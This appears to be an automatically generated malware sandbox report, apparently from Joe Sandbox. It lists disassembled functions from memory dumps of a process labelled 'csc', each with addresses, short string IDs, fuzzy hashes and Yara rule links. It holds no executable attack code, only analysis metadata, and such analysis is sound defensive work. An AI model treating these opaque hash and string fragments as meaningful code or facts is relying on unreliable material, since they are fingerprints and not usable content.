                                                                                                                                                      control_flow_graph 2389 936b8a8-936b959 call 9368ca0 call 9368d40 2401 936b962-936b9a4 call 9368d40 2389->2401 2402 936b95b-936b960 2389->2402 2403 936b9a7-936b9b1 2401->2403 2402->2403 2405 936b9b7-936baae call 936ae78 call 9367f90 call 936ae78 call 9368e30 call 936ae78 2403->2405 2406 936bab3-936bb8f call 936b6a0 call 936ae78 call 9368e30 call 9368588 * 2 call 93686d8 call 936b6a0 call 936ae78 2403->2406 2405->2406 2455 936bb91-936bbbd 2406->2455 2456 936bbca-936bbcf 2406->2456 2455->2456 2469 936bbbf-936bbc5 call 9368240 2455->2469 2478 936bbd2 call 936b618 2456->2478 2479 936bbd2 call 936b608 2456->2479 2458 936bbd8-936bc35 call 936b6a0 call 936ae78 call 93685c8 2475 936bc37 2458->2475 2476 936bc40 2458->2476 2469->2456 2475->2476 2477 936bc41 2476->2477 2477->2477 2478->2458 2479->2458
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$4']q
                                                                                                                                                      • API String ID: 0-3120983240
                                                                                                                                                      • Opcode ID: 67e7994088f6c5687595c923ac1f7f3175c9595debe40d78ab09e32fa8e65395
                                                                                                                                                      • Instruction ID: 8d69716da753a13ba3210837d75ba9ba1fc965c8ff1f9abae427b4b80ea685e1
                                                                                                                                                      • Opcode Fuzzy Hash: 67e7994088f6c5687595c923ac1f7f3175c9595debe40d78ab09e32fa8e65395
                                                                                                                                                      • Instruction Fuzzy Hash: 66C1C875A00218DFCB04EFA4C994AADB7B6FF89305F118168E506AB3A5DB71EC42CF51
                                                                                                                                                      Function 0936A2F1 Relevance: 2.7, Strings: 2, Instructions: 200COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$Haq
                                                                                                                                                      • API String ID: 0-3785302501
                                                                                                                                                      • Opcode ID: 7f9c75edd50863ea73ace3e24ae1a3713779d6e534efe9d33c409917d1937a61
                                                                                                                                                      • Instruction ID: 5e2e50437677a44f6d15b226db769044bd3fb6b3162d5c8f5b03a6069a6fda84
                                                                                                                                                      • Opcode Fuzzy Hash: 7f9c75edd50863ea73ace3e24ae1a3713779d6e534efe9d33c409917d1937a61
                                                                                                                                                      • Instruction Fuzzy Hash: CC61E3307046554FCB26AE39C82466F7BF2AF85304F28856DE446DB2A5DB34DD05CBA1
                                                                                                                                                      Function 0936A160 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$,aq
                                                                                                                                                      • API String ID: 0-1929014441
                                                                                                                                                      • Opcode ID: 5db4893c009700962306396032d05b3ab0e6596898c4a1ebdfbd35b1de51dd13
                                                                                                                                                      • Instruction ID: 5b3a329277d0e10ac22ab9429ba5f8c03ab4833ca092bfabc90fef6dc5be9543
                                                                                                                                                      • Opcode Fuzzy Hash: 5db4893c009700962306396032d05b3ab0e6596898c4a1ebdfbd35b1de51dd13
                                                                                                                                                      • Instruction Fuzzy Hash: 3E41C5327041596FDF029EE99C508FF7FEEEF89210B04406AFA45E3251CA25DD159BB1
                                                                                                                                                      Function 093620F0 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$Haq
                                                                                                                                                      • API String ID: 0-3785302501
                                                                                                                                                      • Opcode ID: 79f94a0422c86a0535d2c02c90029068e37ef32c82b3a00a61fa171abe61d07a
                                                                                                                                                      • Instruction ID: ceaec94202af5375e0aca6ece9216f26840a16c80180c8e029e0e752f1e783c7
                                                                                                                                                      • Opcode Fuzzy Hash: 79f94a0422c86a0535d2c02c90029068e37ef32c82b3a00a61fa171abe61d07a
                                                                                                                                                      • Instruction Fuzzy Hash: 805177307406058FC759BF69C86496E77B3AF893447608468E9469B3A4DF35ED02CBA1
                                                                                                                                                      Function 0937EEA0 Relevance: 2.6, Strings: 2, Instructions: 142COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq$Haq
                                                                                                                                                      • API String ID: 0-3785302501
                                                                                                                                                      • Opcode ID: 4799dbe120f0d190bf0d31c1e88bbd650fef97658b91250a874ed257c8e11a85
                                                                                                                                                      • Instruction ID: e2a3eb9b9de15a83c69b65894169da5cc77cf45ec10e182a9f71f9a8e2d80cec
                                                                                                                                                      • Opcode Fuzzy Hash: 4799dbe120f0d190bf0d31c1e88bbd650fef97658b91250a874ed257c8e11a85
                                                                                                                                                      • Instruction Fuzzy Hash: 344106712047458FD335EF3AC45035ABBE2EF85310F158D69E4868BBA1DB78E846CBA1
                                                                                                                                                      Function 09367D78 Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q$paq
                                                                                                                                                      • API String ID: 0-4101361271
                                                                                                                                                      • Opcode ID: e1674ed9777e3861326635e67872096777e98ab5e96f723e7e86522c6aaa14e1
                                                                                                                                                      • Instruction ID: c8cdcf2a3838721891b2eca7a0db1714b03587ff75af43b8497f35e15874bbd6
                                                                                                                                                      • Opcode Fuzzy Hash: e1674ed9777e3861326635e67872096777e98ab5e96f723e7e86522c6aaa14e1
                                                                                                                                                      • Instruction Fuzzy Hash: AB41C270A003069FC715DF68C8406AEBBA6FF88304F60882CE54A9B655DB75AD468BA1
                                                                                                                                                      Function 09371B6B Relevance: 1.9, Strings: 1, Instructions: 666COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 2
                                                                                                                                                      • API String ID: 0-450215437
                                                                                                                                                      • Opcode ID: 978acc600437ce2798f3f27524ec61f7715a4ca8d8e56d96b27eec0b6acc469a
                                                                                                                                                      • Instruction ID: 4f5fe9972ab70086570df5540ccccfa6cca08b3174eccd60309bd3429278bb15
                                                                                                                                                      • Opcode Fuzzy Hash: 978acc600437ce2798f3f27524ec61f7715a4ca8d8e56d96b27eec0b6acc469a
                                                                                                                                                      • Instruction Fuzzy Hash: 87522D70A00205CFDB64EF68D894A9EBBF2FF49350F1084A9E90A9B355DB349D86CF51
                                                                                                                                                      Function 09363400 Relevance: 1.8, Strings: 1, Instructions: 534COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (_]q
                                                                                                                                                      • API String ID: 0-188044275
                                                                                                                                                      • Opcode ID: 0795a96d40c0c3db25802151117016bd56619214830b5359ef9ffd5d44143dc4
                                                                                                                                                      • Instruction ID: 880aee3a6388a53a5d002f755a2555932e32b870423305346d4959c0fe1b9768
                                                                                                                                                      • Opcode Fuzzy Hash: 0795a96d40c0c3db25802151117016bd56619214830b5359ef9ffd5d44143dc4
                                                                                                                                                      • Instruction Fuzzy Hash: B7226C35A00204DFDB14DFA9D890AADBBF6FF88314F158069E9059B3A5DB71EC42CB91
                                                                                                                                                      Function 09364D00 Relevance: 1.7, Strings: 1, Instructions: 428COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $]q
                                                                                                                                                      • API String ID: 0-1007455737
                                                                                                                                                      • Opcode ID: 6ed5d7cd5cbe69e47d3892b062c15b254f7d6c86897ea0ea334d7382ac69b558
                                                                                                                                                      • Instruction ID: 75c901c42edd5763ae4e9be40942fa880c8d25e8485a378a8de03fc4c1757b9b
                                                                                                                                                      • Opcode Fuzzy Hash: 6ed5d7cd5cbe69e47d3892b062c15b254f7d6c86897ea0ea334d7382ac69b558
                                                                                                                                                      • Instruction Fuzzy Hash: D2F117717042029FDB15AF65C84566EBBE2EF86340F148479F982CB7E5CA35EC42CB92
                                                                                                                                                      Function 0A280040 Relevance: 1.7, Strings: 1, Instructions: 407COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Haq
                                                                                                                                                      • API String ID: 0-725504367
                                                                                                                                                      • Opcode ID: 4cedced66d37e1815778c69ba36085f862095641c7f389da7a15e2e699fbf71d
                                                                                                                                                      • Instruction ID: 0af864ab1050917d6cf18e73d4f8a4560cec36dcffb422c4c1058fdfc4116753
                                                                                                                                                      • Opcode Fuzzy Hash: 4cedced66d37e1815778c69ba36085f862095641c7f389da7a15e2e699fbf71d
                                                                                                                                                      • Instruction Fuzzy Hash: D1E1F4702297028FDB24EF39D45072A77E2FF81344F148979E4468B6D1DB78E84ACB52
                                                                                                                                                      Function 0505F678 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0505F6EC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4045555224.0000000005050000.00000040.00000800.00020000.00000000.sdmp, Offset: 05050000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_5050000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                      • Opcode ID: d9453c47032f436c182b958e4349feff8b26cd4b882b485fcedd197638eeed43
                                                                                                                                                      • Instruction ID: e83d136cfb50010e7d95906ed02021d0314de5999b39ee2277c7f5e36e4fca21
                                                                                                                                                      • Opcode Fuzzy Hash: d9453c47032f436c182b958e4349feff8b26cd4b882b485fcedd197638eeed43
                                                                                                                                                      • Instruction Fuzzy Hash: 9411F7B1D002099FCB10DFAAC445A9FFBF4FF88320F148429D419A7250CB75A945CFA1
                                                                                                                                                      Function 093749C0 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Ddq
                                                                                                                                                      • API String ID: 0-562783569
                                                                                                                                                      • Opcode ID: 54e5c827b3c537d29a4bf9723e0b9c1b674a6331d369c7992afcc349fba04fbc
                                                                                                                                                      • Instruction ID: 2eed9d4c321d3f40db0cee15158a2147c1fff2958f4d8dfe77845627ba90d2e8
                                                                                                                                                      • Opcode Fuzzy Hash: 54e5c827b3c537d29a4bf9723e0b9c1b674a6331d369c7992afcc349fba04fbc
                                                                                                                                                      • Instruction Fuzzy Hash: D0A19C746006059FC724DF69D894A5ABBF6FF89324F218569E845EB3A1DB34EC02CF90
                                                                                                                                                      Function 0936877A Relevance: 1.5, Strings: 1, Instructions: 223COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q
                                                                                                                                                      • API String ID: 0-1259897404
                                                                                                                                                      • Opcode ID: 0b6c3b2e69b70d386b40bb761967b3310a3cc675508ee7731bfe186d644282e2
                                                                                                                                                      • Instruction ID: 20abcfd0af8b3ec9e3678c5468c108817294c45220ac4cef02a8a485f10e9c7d
                                                                                                                                                      • Opcode Fuzzy Hash: 0b6c3b2e69b70d386b40bb761967b3310a3cc675508ee7731bfe186d644282e2
                                                                                                                                                      • Instruction Fuzzy Hash: 4CA1DA34A10218DFCB04EFA4D898A9DBBB2FF89304F158559E506AB365DB70EC46CF91
                                                                                                                                                      Function 0A2895A8 Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq
                                                                                                                                                      • API String ID: 0-600464949
                                                                                                                                                      • Opcode ID: e3833789fc754d0bf3fdc2d6cd458147c0a040f9f7b6c5d8e24f347177591a4c
                                                                                                                                                      • Instruction ID: d9a251e86ee36d8c943a8f4d7788c1cf60635a7b8c68a5ee50f1f114725f38ed
                                                                                                                                                      • Opcode Fuzzy Hash: e3833789fc754d0bf3fdc2d6cd458147c0a040f9f7b6c5d8e24f347177591a4c
                                                                                                                                                      • Instruction Fuzzy Hash: 5681BFB0B21202DFDB28EF64D454BBA77B2AF84300F158079E4168B6D1DB75AD82CB91
                                                                                                                                                      Function 09369D40 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: ,aq
                                                                                                                                                      • API String ID: 0-3092978723
                                                                                                                                                      • Opcode ID: a470c53553af0a37e0ab11ec80a6c62c634f4c45508a400417f794848dcc7eb5
                                                                                                                                                      • Instruction ID: 30b5398951fac7263d775c7baf2d0bd009a73d94f270525b480a152b1b0fae60
                                                                                                                                                      • Opcode Fuzzy Hash: a470c53553af0a37e0ab11ec80a6c62c634f4c45508a400417f794848dcc7eb5
                                                                                                                                                      • Instruction Fuzzy Hash: 16A1A175A002288FCB64DF69C981BD9BBF2BB49300F1581D9E549E7365D7309E81CF61
                                                                                                                                                      Function 0A287671 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4048471418.000000000A280000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A280000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_a280000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: `Qw
                                                                                                                                                      • API String ID: 0-1857960717
                                                                                                                                                      • Opcode ID: 6cf55236f3dc5fb8fa5b5a134ed7125007a64e97235ae6f8a00c5c02ad4e29ff
                                                                                                                                                      • Instruction ID: 897471fa4b3e74a6cb48300662e34b65ff902d8f7f1a89de91779b837b4086df
                                                                                                                                                      • Opcode Fuzzy Hash: 6cf55236f3dc5fb8fa5b5a134ed7125007a64e97235ae6f8a00c5c02ad4e29ff
                                                                                                                                                      • Instruction Fuzzy Hash: AE717F74A1120ADFDB19EF68C554AADB7F2FF88304F248568E405AB3A0DB75EC41CB91
                                                                                                                                                      Function 093749B0 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: Ddq
                                                                                                                                                      • API String ID: 0-562783569
                                                                                                                                                      • Opcode ID: 4d3c736bed3fff07ff88481ec90c713fe910d4bf798ce11f4f2e9e85816950a7
                                                                                                                                                      • Instruction ID: 8ca93fe3004c8ff993c93517c61125f9ae1489c406ef0961defb3d808d8949ca
                                                                                                                                                      • Opcode Fuzzy Hash: 4d3c736bed3fff07ff88481ec90c713fe910d4bf798ce11f4f2e9e85816950a7
                                                                                                                                                      • Instruction Fuzzy Hash: C5715A746006019FC724DF29D588A99BBF2FF89320B258568E856EB361DB74FC42CF90
                                                                                                                                                      Function 0937E480 Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: paq
                                                                                                                                                      • API String ID: 0-3273118895
                                                                                                                                                      • Opcode ID: 706f7047f523a66628d79370f841540738bef147b97641e8a020e5b6c698759e
                                                                                                                                                      • Instruction ID: 21210e458803cbc8af1311a863e44d93fddf77940ab9067ccd608b8de00ba623
                                                                                                                                                      • Opcode Fuzzy Hash: 706f7047f523a66628d79370f841540738bef147b97641e8a020e5b6c698759e
                                                                                                                                                      • Instruction Fuzzy Hash: 7C514F76600104AFCB559FA8C845D5ABBF7FF8D314B1584D8E2099B372DA32DC22DB91
                                                                                                                                                      Function 09372DD9 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: TJbq
                                                                                                                                                      • API String ID: 0-1760495472
                                                                                                                                                      • Opcode ID: 24f53a3fe6cb686808a0924de5ffb32da8263e21cf2b760a4c940e6bc4bd6e58
                                                                                                                                                      • Instruction ID: a684da6c8b116089f7592847022330fdad9bfd75cb9b1760fc904521afa5a0bb
                                                                                                                                                      • Opcode Fuzzy Hash: 24f53a3fe6cb686808a0924de5ffb32da8263e21cf2b760a4c940e6bc4bd6e58
                                                                                                                                                      • Instruction Fuzzy Hash: 6051AF357046008FC729EF24C449A5ABBE6FF89750B0945BAE85ACB772C774EC01CB95
                                                                                                                                                      Function 0936DB58 Relevance: 1.4, Strings: 1, Instructions: 141COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q
                                                                                                                                                      • API String ID: 0-1259897404
                                                                                                                                                      • Opcode ID: 19999915cc22882e553239f3b7c227aa27512d54ab033b803974a86231b4e0e7
                                                                                                                                                      • Instruction ID: a2000203c861c2c4c2adf14a2f2693f84c50213b53f9d8909ff01f8cadab882d
                                                                                                                                                      • Opcode Fuzzy Hash: 19999915cc22882e553239f3b7c227aa27512d54ab033b803974a86231b4e0e7
                                                                                                                                                      • Instruction Fuzzy Hash: 5D415234B106189FCB14AB68D854AAEB7B7EFCD704F10D419E5029B3A8CF74AC468F91
                                                                                                                                                      Function 09372D9A Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: TJbq
                                                                                                                                                      • API String ID: 0-1760495472
                                                                                                                                                      • Opcode ID: 21671dd3fc6363e92983d2623cc2bb0377e03783e1ddc1a83827d666c9d7d1c0
                                                                                                                                                      • Instruction ID: 83844d74aa04aa54aaaf53d2e91c55e089aa6040735f0a12cc93523d257f0e25
                                                                                                                                                      • Opcode Fuzzy Hash: 21671dd3fc6363e92983d2623cc2bb0377e03783e1ddc1a83827d666c9d7d1c0
                                                                                                                                                      • Instruction Fuzzy Hash: 5E417C357042408FD725DB38C458B6ABBE5EF8A754F0501BAE94ACB7B2CA64EC018B91
                                                                                                                                                      Function 0937F4A8 Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: (aq
                                                                                                                                                      • API String ID: 0-600464949
                                                                                                                                                      • Opcode ID: 1f4d8c5cf2544f88eb7e423f9f14ada94b038b20ab346c667e929ee14813f5e8
                                                                                                                                                      • Instruction ID: 547ef487318ba2ef6268be546292c6b8c44b3fb7c995544671a812a2ad210817
                                                                                                                                                      • Opcode Fuzzy Hash: 1f4d8c5cf2544f88eb7e423f9f14ada94b038b20ab346c667e929ee14813f5e8
                                                                                                                                                      • Instruction Fuzzy Hash: EB41BF35A006168FCB11DF68C88496AFBB1FF89324B158699E855AB392D734FC52CFD0
                                                                                                                                                      Function 09372E58 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047284295.0000000009370000.00000040.00000800.00020000.00000000.sdmp, Offset: 09370000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9370000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: TJbq
                                                                                                                                                      • API String ID: 0-1760495472
                                                                                                                                                      • Opcode ID: a1a038a5ff2313cf2e14f0edc03a8514375fb86f68325a4456cdb46b6357fee4
                                                                                                                                                      • Instruction ID: e4ab7894c21ada892a1ca2f8e20a444a21170dce95e3fb3d1c40804682816dc6
                                                                                                                                                      • Opcode Fuzzy Hash: a1a038a5ff2313cf2e14f0edc03a8514375fb86f68325a4456cdb46b6357fee4
                                                                                                                                                      • Instruction Fuzzy Hash: EC316E353002108FD724EF79D498F2AB7E5EF89765F1500A9E90ACB7B2CA65EC018B91
                                                                                                                                                      Function 09367BF0 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 4']q
                                                                                                                                                      • API String ID: 0-1259897404
                                                                                                                                                      • Opcode ID: c60aa0589dcdd391a884fbb471f66f757c2dfeb0c63f46aa76dbed9def40ca26
                                                                                                                                                      • Instruction ID: 716de23a4e18fb8c7aa39acc664423ce2f0e3a23b94cfe0d772a46ec6a194d61
                                                                                                                                                      • Opcode Fuzzy Hash: c60aa0589dcdd391a884fbb471f66f757c2dfeb0c63f46aa76dbed9def40ca26
                                                                                                                                                      • Instruction Fuzzy Hash: 6331B135B00105AFCB09AFA4D898D9EBBB6FF88350B154069E6069B365CA31EC12CB91
                                                                                                                                                      Function 09362747 Relevance: 1.3, Strings: 1, Instructions: 78COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000003.00000002.4047259661.0000000009360000.00000040.00000800.00020000.00000000.sdmp, Offset: 09360000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_3_2_9360000_csc.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: p<]q
                                                                                                                                                      • API String ID: 0-1327301063
                                                                                                                                                      • Opcode ID: 14b157583a8a1dba6b26a76e39bd3865417acbfedd1b93985bcb8f2e33e91cdc
                                                                                                                                                      • Instruction ID: 12f8ad04ed776386aa13cc724fae0d43cd5f64081b8da8df99f043f4a243f09e
                                                                                                                                                      • Opcode Fuzzy Hash: 14b157583a8a1dba6b26a76e39bd3865417acbfedd1b93985bcb8f2e33e91cdc
                                                                                                                                                      • Instruction Fuzzy Hash: 15215C753042449FCB058F2AC844DAA7BEAEF8A300B1680A6FD54CB276CA35DC51CB60
                                                                                                                                                      Function 09362758 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
